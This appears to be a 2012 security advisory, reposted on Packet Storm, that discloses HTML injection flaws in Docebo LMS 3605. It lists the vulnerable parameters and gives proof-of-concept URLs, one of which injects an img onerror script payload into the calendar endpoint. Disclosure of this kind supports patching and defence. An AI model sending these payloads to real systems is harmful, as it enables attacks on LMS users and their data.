Docebo LMS version 3605 suffers from an html injection vulnerability.
ae051ccb5099475b3a2e4aaf6262e447d9724784b7df01d18ada75376866b3c4[ TITLE ....... ][ Docebo LMS HTML Injection
[ DATE ........ ][ 15.04.2012
[ AUTOHR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.docebo.com
[ VERSION ..... ][ docebo_3605.zip
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [
[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...
[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it! ;)
[--------------------------------------------[
[ 2. What is the type of vulnerability?
HTML Injection.
[--------------------------------------------[
[ 3. Where is bug :)
HTTP GET 'attack' should look like this:
http://docebo/doceboLms/index.php?modname=course&op=infocourse&id_module_sel=10+payload
Vulnerable parameter is :
id_module_sel,
ord,
op_listview_idplayitem,
working_area,
(more?)
Anyway, I was able to 'attack' application only in automated way.
Directly accesing parameter id_module_sel with payload (html injection string)
is not working. Setting few attacks (for example 10) could do adding to DB/cache(?)
content (payload) and 'selecting it' with next request(with next payload).
Wierd, but works. Question for now is how to automate this to 'real exploitation
scenarion' ;) For education of course.
Try this:
http://docebo/doceboLms/index.php?modname=course&op=infocourse&id_module_sel=10}%3E%3Ch1%3Etest%3Cbr%3Etest2%3C%2fh1%3E
Screens of attack You will find @ my blog. ;)
And this:
http://docebo/doceboLms/ajax.server.php?plf=lms&mn=calendar&op=set&index=0&id=%3Ch1%3E%3Cimg%20src=x%20onerror=alert%28123%29%3Eaaaaa%3C/h1%3E&_owner=1040&calEventClass=lms&private=on&start_day=15&start_month=4&start_year=2012&start_hour=09&start_min=00&start_sec=00&end_day=15&end_month=4&end_year=2012&end_hour=09&end_min=00&end_sec=00&category=a&title=aaaaaaaaaaaaaa&description=bbbbbbbbbbbbbbb
Vulnerable parameters here are: id and index.
[--------------------------------------------[
[ 4. More...
- http://hauntit.blogspot.com
- http://www.docebo.com
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;)
]
[ Best regards
[
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed